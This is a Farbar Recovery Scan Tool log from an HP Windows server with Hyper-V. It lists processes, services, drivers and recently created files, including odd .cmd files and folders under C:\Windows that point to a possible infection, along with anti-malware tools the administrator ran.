(Hewlett-Packard Company) C:\hp\hpsmh\bin\smhstart.exe
(Hewlett-Packard Company) C:\Windows\system32\CPQNiMgt\cpqnimgt.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe
(Microsoft Corporation) C:\Windows\system32\vmms.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Hewlett-Packard Company) C:\Program Files\HP\NCU\cpqteam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\msiexec.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [CPQTEAM] - C:\Program Files\HP\NCU\cpqteam.exe [73728 2010-04-27] (Hewlett-Packard Company)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1436224 2010-11-30] (Microsoft Corporation)
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
HKLM\...\Policies\Explorer: [showSuperHidden] 1
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
Lsa: [Notification Packages] scecli rassfm

==================== Internet (Whitelisted) ====================


HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab
Handler: hpapp\Apps - No CLSID Value -
Handler-x32: hpapp\Apps - No CLSID Value -
Hosts: 188.122.70.10         scom01.asapnet.local
Tcpip\..\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: [NameServer]192.168.10.11,8.8.8.8

==================== Services (Whitelisted) =================

S4 AdtAgent; C:\Windows\system32\AdtAgent.exe [407176 2012-10-30] (Microsoft Corporation)
S4 CIMnotify; C:\Windows\system32\CIMntfy\cimntfy.exe [268392 2010-05-26] (Hewlett-Packard Company)
R2 Cissesrv; C:\Program Files\HP\Cissesrv\cissesrv.exe [167424 2010-03-19] (Hewlett-Packard Company)
R2 CpqNicMgmt; C:\Windows\system32\CPQNiMgt\cpqnimgt.exe [9728 2010-04-28] (Hewlett-Packard Company)
R2 CpqRcmc; C:\Windows\system32\cpqrcmc.exe [22568 2008-11-14] (Hewlett-Packard Company)
R2 cpqvcagent; C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe [1307648 2010-03-25] (Hewlett-Packard Company)
R2 CqMgHost; C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgServ; C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgStor; C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe [20992 2010-04-09] (Hewlett-Packard Company)
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-14] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe [25200 2012-10-30] (Microsoft Corp.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2010-11-11] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [282616 2010-11-11] (Microsoft Corporation)
R2 nvspwmi; C:\Windows\system32\nvspwmi.dll [407040 2010-11-21] (Microsoft Corporation)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-14] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-14] (Microsoft Corporation)
S2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
R2 sysdown; C:\Windows\system32\sysdown.exe [17960 2010-01-25] (Hewlett-Packard Company)
R2 SysMgmtHp; C:\hp\hpsmh\bin\smhstart.exe [2041856 2010-01-28] (Hewlett-Packard Company)
S4 System Center Management APM; C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe [633968 2012-10-30] (Microsoft Corp.)
R2 vhdsvc; C:\Windows\system32\vhdsvc.dll [193024 2010-11-21] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [4625408 2010-11-21] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 ati2mtag; C:\Windows\System32\DRIVERS\ati2mtag.sys [2210816 2009-06-24] (ATI Technologies Inc.)
R3 CpqCiDrv; C:\Windows\System32\DRIVERS\cpqcidrv.sys [51752 2009-05-11] (Hewlett-Packard Company)
S3 CPQTeam; C:\Windows\System32\DRIVERS\cpqteam.sys [225792 2010-02-24] (Hewlett-Packard Company)
R0 HpCISSs2; C:\Windows\System32\DRIVERS\HpCISSs2.sys [156776 2010-02-22] (Hewlett-Packard Company)
R0 hpqilo2; C:\Windows\System32\DRIVERS\hpqilo2.sys [160296 2010-01-25] (Hewlett-Packard Company)
R1 hvboot; C:\Windows\System32\drivers\hvboot.sys [119168 2010-11-21] (Microsoft Corporation)
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [188928 2010-10-24] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [72064 2010-10-24] (Microsoft Corporation)
R3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [20992 2010-11-21] (Microsoft Corporation)
R3 q57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [384040 2010-04-30] (Broadcom Corporation)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-14] (Microsoft Corporation)
R3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [17408 2010-11-21] (Microsoft Corporation)
R3 VMSMP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)
S3 VMSP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)

========================== Drivers MD5 =======================

C:\Windows\system32\drivers\1394ohci.sys ==> MD5 is legit
C:\Windows\System32\drivers\ACPI.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\acpipmi.sys ==> MD5 is legit
C:\Windows\system32\drivers\adp94xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpu320.sys ==> MD5 is legit
C:\Windows\system32\drivers\afd.sys 79059559E89D06E8B80CE2944BE20228
C:\Windows\system32\drivers\agp440.sys ==> MD5 is legit
C:\Windows\system32\drivers\aliide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdk8.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsata.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsbs.sys ==> MD5 is legit
C:\Windows\System32\drivers\amdxata.sys ==> MD5 is legit
C:\Windows\system32\drivers\appid.sys ==> MD5 is legit
C:\Windows\system32\drivers\arc.sys ==> MD5 is legit
C:\Windows\system32\drivers\arcsas.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\asyncmac.sys ==> MD5 is legit
C:\Windows\System32\drivers\atapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ati2mtag.sys 8BF2F7453BA6233F76A45FB1E73B7419
C:\Windows\system32\drivers\bxvbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys C1E625A71A82226FA39C1296C5940291
C:\Windows\System32\Drivers\Beep.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\blbdrive.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bowser.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltLo.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltUp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Brserid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrSerWdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbMdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbSer.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdfs.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdrom.sys ==> MD5 is legit
C:\Windows\System32\CLFS.sys ==> MD5 is legit
C:\Windows\system32\drivers\CmBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\cmdide.sys ==> MD5 is legit
C:\Windows\System32\Drivers\cng.sys EBF28856F69CF094A902F884CF989706
C:\Windows\system32\drivers\compbatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\CompositeBus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cpqcidrv.sys 42359CD29C14C94ACE1F908852259E28
C:\Windows\System32\DRIVERS\cpqteam.sys D1EAFA0F8F4FF31A544F43110E6CDA8B
C:\Windows\system32\drivers\crcdisk.sys ==> MD5 is legit
C:\Windows\System32\Drivers\dfsc.sys ==> MD5 is legit
C:\Windows\System32\drivers\discache.sys ==> MD5 is legit
C:\Windows\System32\drivers\disk.sys ==> MD5 is legit
C:\Windows\system32\drivers\dmvsc.sys 5DB085A8A6600BE6401F2B24EECB5415
C:\Windows\System32\drivers\dxgkrnl.sys 88612F1CE3BF42256913BF6E61C70D52
C:\Windows\system32\drivers\evbda.sys ==> MD5 is legit
C:\Windows\system32\drivers\elxstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\errdev.sys ==> MD5 is legit
C:\Windows\System32\Drivers\exfat.sys ==> MD5 is legit
C:\Windows\System32\Drivers\fastfat.sys ==> MD5 is legit
C:\Windows\system32\drivers\fdc.sys ==> MD5 is legit
C:\Windows\System32\drivers\fileinfo.sys ==> MD5 is legit
C:\Windows\System32\drivers\filetrace.sys ==> MD5 is legit
C:\Windows\system32\drivers\flpydisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\fltmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\FsDepends.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Fs_Rec.sys 6BD9295CC032DD3077C671FCCF579A7B
C:\Windows\system32\drivers\gagp30kx.sys ==> MD5 is legit
C:\Windows\system32\drivers\HDAudBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\HidBatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hidusb.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\HpCISSs2.sys 64F1B1D6DFA66F59F552864B4FBE7680
C:\Windows\System32\DRIVERS\hpqilo2.sys D6EF2C4F0B02FD82FAC3887086D56443
C:\Windows\System32\drivers\HpSAMD.sys ==> MD5 is legit
C:\Windows\System32\drivers\HTTP.sys ==> MD5 is legit
C:\Windows\System32\drivers\hvboot.sys A31E10560985A0AF994E86F80C458E76
C:\Windows\System32\drivers\hwpolicy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\i8042prt.sys ==> MD5 is legit
C:\Windows\system32\drivers\iaStorV.sys ==> MD5 is legit
C:\Windows\system32\drivers\iirsp.sys ==> MD5 is legit
C:\Windows\system32\drivers\intelide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\intelppm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\qd260x64.sys FF0FB51A0ACC2E2D0D412138A05A0B59
C:\Windows\System32\DRIVERS\ipfltdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\IPMIDrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\ipnat.sys ==> MD5 is legit
C:\Windows\system32\drivers\isapnp.sys ==> MD5 is legit
C:\Windows\system32\drivers\msiscsi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdhid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ksecdd.sys 8F489706472F7E9A06BAAA198703FA64
C:\Windows\System32\Drivers\ksecpkg.sys 868A2CAAB12EFC7A021682BCA0EEC54C
C:\Windows\system32\drivers\ksthunk.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lltdio.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_fc.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas2.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_scsi.sys ==> MD5 is legit
C:\Windows\system32\drivers\luafv.sys ==> MD5 is legit
C:\Windows\system32\drivers\megasas.sys ==> MD5 is legit
C:\Windows\system32\drivers\MegaSR.sys ==> MD5 is legit
C:\Windows\System32\drivers\modem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\monitor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouhid.sys ==> MD5 is legit
C:\Windows\System32\drivers\mountmgr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\MpFilter.sys ==> MD5 is legit
C:\Windows\system32\drivers\mpio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\MpNWMon.sys ==> MD5 is legit
C:\Windows\System32\drivers\mpsdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mrxsmb.sys A5D9106A73DC88564C825D317CAC68AC
C:\Windows\System32\DRIVERS\mrxsmb10.sys D711B3C1D5F42C0C2415687BE09FC163
C:\Windows\System32\DRIVERS\mrxsmb20.sys 9423E9D355C8D303E76B8CFBD8A5C30C
C:\Windows\system32\drivers\msahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\msdsm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Msfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\mshidkmdf.sys ==> MD5 is legit
C:\Windows\System32\drivers\msisadrv.sys ==> MD5 is legit
C:\Windows\System32\Drivers\MsRPC.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mssmbios.sys ==> MD5 is legit
C:\Windows\system32\drivers\MTConfig.sys ==> MD5 is legit
C:\Windows\System32\Drivers\mup.sys ==> MD5 is legit
C:\Windows\System32\drivers\ndis.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiscap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndistapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndisuio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiswan.sys ==> MD5 is legit
C:\Windows\System32\Drivers\NDProxy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbios.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbt.sys ==> MD5 is legit
C:\Windows\system32\drivers\nfrd960.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\NisDrvWFP.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Npfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Ntfs.sys B98F8C6E31CD07B2E6F71F7F648E38C0
C:\Windows\System32\Drivers\Null.sys ==> MD5 is legit
C:\Windows\system32\drivers\nvraid.sys ==> MD5 is legit
C:\Windows\system32\drivers\nvstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\nv_agp.sys ==> MD5 is legit
C:\Windows\system32\drivers\ohci1394.sys ==> MD5 is legit
C:\Windows\system32\drivers\parport.sys ==> MD5 is legit
C:\Windows\System32\drivers\partmgr.sys E9766131EEADE40A27DC27D2D68FBA9C
C:\Windows\System32\drivers\passthruparser.sys 201685812EABAB0FB7914455C21C90DA
C:\Windows\System32\drivers\pci.sys ==> MD5 is legit
C:\Windows\System32\drivers\pciide.sys ==> MD5 is legit
C:\Windows\system32\drivers\pcmcia.sys ==> MD5 is legit
C:\Windows\System32\drivers\pcw.sys ==> MD5 is legit
C:\Windows\System32\drivers\peauth.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspptp.sys ==> MD5 is legit
C:\Windows\system32\drivers\processr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pacer.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys C1E625A71A82226FA39C1296C5940291
C:\Windows\system32\drivers\ql2300.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql40xx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasacd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\RDPWD.sys E61608AA35E98999AF9AAEEEA6114B0A
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\sacdrv.sys D65E5E5C59F70516E856F5350106CDAB
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\Drivers\secdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\srv.sys 441FBA48BFF01FDB9D5969EBC1838F0B
C:\Windows\System32\DRIVERS\srv2.sys B4ADEBBF5E3677CCE9651E0F01F7CC28
C:\Windows\System32\DRIVERS\srvnet.sys 27E461F0BE5BFF5FC737328F749538C3
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\System32\drivers\vmstorfl.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsp.sys FC0C1B9FCBD88266CA295A3F728B6D35
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\System32\drivers\tcpip.sys DB74544B75566C974815E79A62433F29
C:\Windows\System32\DRIVERS\tcpip.sys DB74544B75566C974815E79A62433F29
C:\Windows\System32\drivers\tcpipreg.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys 51C5ECEB1CDEE2468A1748BE550CFBC8
C:\Windows\System32\DRIVERS\tdx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\tssecsrv.sys 4CE278FC9671BA81A138D70823FCAA09
C:\Windows\System32\drivers\tsusbflt.sys ==> MD5 is legit
C:\Windows\system32\drivers\TsUsbGD.sys 9CC2CCAE8A84820EAECB886D477CBCB8
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbccgp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbehci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbhub.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbohci.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbprint.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\USBSTOR.SYS ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbuhci.sys ==> MD5 is legit
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vhdmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vhdparser.sys F59490F45EF1F4733CDBBF5B4B2F6950
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\Vid.sys 1720D283BDB1EAA7F21976586FF52B95
C:\Windows\system32\drivers\vmbus.sys 80E731A278695B47345D0171A19E428B
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vmswitch.sys 3BAFE9FF545609476D14D277C09F6922
C:\Windows\System32\DRIVERS\vmswitch.sys 3BAFE9FF545609476D14D277C09F6922
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys ==> MD5 is legit
C:\Windows\System32\drivers\volsnap.sys ==> MD5 is legit
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\drivers\Wdf01000.sys E2C933EDBC389386EBE6D2BA953F43D8
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\system32\drivers\wmiacpi.sys ==> MD5 is legit
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\drivers\WudfPf.sys ==> MD5 is legit

==================== NetSvcs (Whitelisted) ===================

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== One Month Created Files and Folders ========

2014-02-24 09:53 - 2014-02-24 09:53 - 00022993 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-24 09:52 - 2014-02-24 09:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\FRST-OlderVersion
2014-02-24 09:41 - 2014-02-24 09:53 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-23 13:55 - 2014-02-23 13:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp65.cmd
2014-02-23 13:52 - 2014-02-23 13:52 - 00000034 _____ () C:\Windows\SysWOW64\tmp64.cmd
2014-02-23 13:45 - 2014-02-23 13:45 - 00001352 _____ () C:\Windows\SysWOW64\tmp63.cmd
2014-02-23 13:38 - 2014-02-23 13:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp61.cmd
2014-02-22 19:34 - 2014-02-22 19:34 - 00000034 _____ () C:\Windows\SysWOW64\tmp57.cmd
2014-02-22 19:21 - 2014-02-22 19:21 - 00001380 _____ () C:\Windows\SysWOW64\tmp54.cmd
2014-02-22 19:04 - 2014-02-22 19:04 - 00000034 _____ () C:\Windows\SysWOW64\tmp50.cmd
2014-02-22 18:50 - 2014-02-22 18:50 - 00001380 _____ () C:\Windows\SysWOW64\tmp47.cmd
2014-02-22 02:16 - 2014-02-22 02:12 - 01150280 _____ (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\F3C0.tmp
2014-02-21 18:14 - 2014-02-21 18:14 - 00000034 _____ () C:\Windows\SysWOW64\tmp43.cmd
2014-02-21 18:00 - 2014-02-21 18:00 - 00001380 _____ () C:\Windows\SysWOW64\tmp40.cmd
2014-02-19 09:35 - 2014-02-24 09:52 - 02155520 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-18 19:55 - 2014-02-23 13:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:44 - 2014-02-23 13:45 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-23 13:42 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:38 - 2014-02-23 13:42 - 00000000 ____D () C:\Windows\ric
2014-02-15 14:23 - 2014-02-17 17:14 - 00000000 ____D () C:\Windows\ric_
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-02-11 01:07 - 00847752 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\goopdate.dll85b32115
2014-02-07 15:04 - 2014-02-17 17:22 - 00000000 ____D () C:\Windows\mtc_
2014-02-07 14:57 - 2014-02-17 17:18 - 00000000 ____D () C:\Windows\pts_
2014-02-07 14:45 - 2014-02-15 09:21 - 00000000 ____D () C:\Windows\xpm_
2014-02-07 14:42 - 2014-02-18 02:29 - 00000000 ____D () C:\Windows\tanechka_
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 09:53 - 2014-02-24 09:53 - 00000000 ____D () C:\FRST
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:38 - 2014-01-29 09:39 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:38 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:47 - 2014-02-14 13:59 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:01 - 2014-01-29 10:47 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
